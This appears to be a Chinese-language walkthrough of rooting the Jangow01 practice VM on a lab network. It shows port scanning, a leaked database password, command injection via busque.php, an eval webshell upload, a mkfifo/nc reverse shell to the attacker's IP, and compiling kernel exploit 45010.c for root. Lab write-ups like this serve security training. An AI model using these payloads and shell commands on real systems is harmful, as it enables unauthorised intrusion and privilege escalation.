主机:192.168.10.106
靶机:192.168.10.107
nmap -p- 192.168.10.107
21/tcp open ftp
80/tcp open http
nmap -sS -sV -A -n 192.168.10.107
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
dirsearch -u http://192.168.10.107/site/
dirsearch -u http://192.168.10.107
#访问备份文件,发现数据库连接源码,得到用户jangow01的密码
http://192.168.10.107/.backup
$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
#访问提供的木马接口查看源码。
http://192.168.10.107/site/busque.php?buscar=cat busque.php
<?php system($_GET['buscar']); ?>
#上传一句话木马,方便蚁剑连接。
http://192.168.10.107/site/busque.php?buscar=echo '<?php @eval($_POST["a"]);' > hack.php
#蚁剑连接成功
http://192.168.10.107/site/hack.php
#因为靶机开启防火墙,只有443端口开放,使用nc获取shell
nc -lvvp 443
#依然禁止了-e参数
nc -e /bin/bash 192.168.10.106 443
#主机获取shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.106 433 >/tmp/f
#开启交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
#查看靶机信息
uname -a #Linux jangow01 4.4.0-31-generic
#得到靶机系统为ubuntu 16.04
lsb_release -a
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
#查询可用漏洞
searchsploit ubuntu 4.4.0-31
searchsploit ubuntu 16.04
#获取提权程序源码
searchsploit -m 45010.c
#上传蚁剑编译提权
gcc 45010.c -o exp
#提权成功,通关
cat proof.txt
@@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
@ @@@@@@@@@@@@@@@&# #@@@@@@@@&(. /&@@@@@@@@@@
@ @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@& .&@@@@@
@ @@@@@@@& @@@@@@&@@@@@&%######%&@* ./@@* &@@
@ @@@@@* (@@@@@@@@@#/. .*@. .#&. &@@@&&
@ @@@, /@@@@@@@@#, .@. ,&, @@&&
@ @& @@@@@@@@#. @@@,@@@/ %. #, %@&
@@@# @@@@@@@@/ .@@@@@@@@@@ * ., @@
@@& @@@@@@@@* @@@@@@@@@@@ , @
@& .@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ *. &@
@@/ *@@@@@@@/ @@@@@@@@@@@# @@
@@ .@@@@@@@/ @@@@@@@@@@@@@ @# @@
@@ @@@@@@@@. @@@@@@@@@@@ @@( @@
@& .@@@@@@@@. , @@@@@@@ * .@@@*( .@
@@ ,@@@@@@@@, @@@@@@@@@&*%@@@@@@@@@, @@@@@(%&* &@
@@& @@@@@@@@@@@@@@@@@ (@@@@@@@@@@@@@@%@@/ &@
@ @& ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%* &@
@ @@. .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%* &@&
@ @@@& ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/ &@@&&
@ @@@@@@. *%@@@@@@@@@@@@@@@@@@@@&#/. &@@@@&&
@ @@@@@@@@& JANGOW &@@@
@ &&&&&&&&&@@@& @@(&@ @. %.@ @@%@ &@@@&&&&
&&&@@@@&% &/ (&&@@@&&&
(((((((((((((((((((((((((((((
da39a3ee5e6b4b0d3255bfef95601890afd80709
jangow01靶机渗透记录
最新推荐文章于 2025-04-29 16:04:21 发布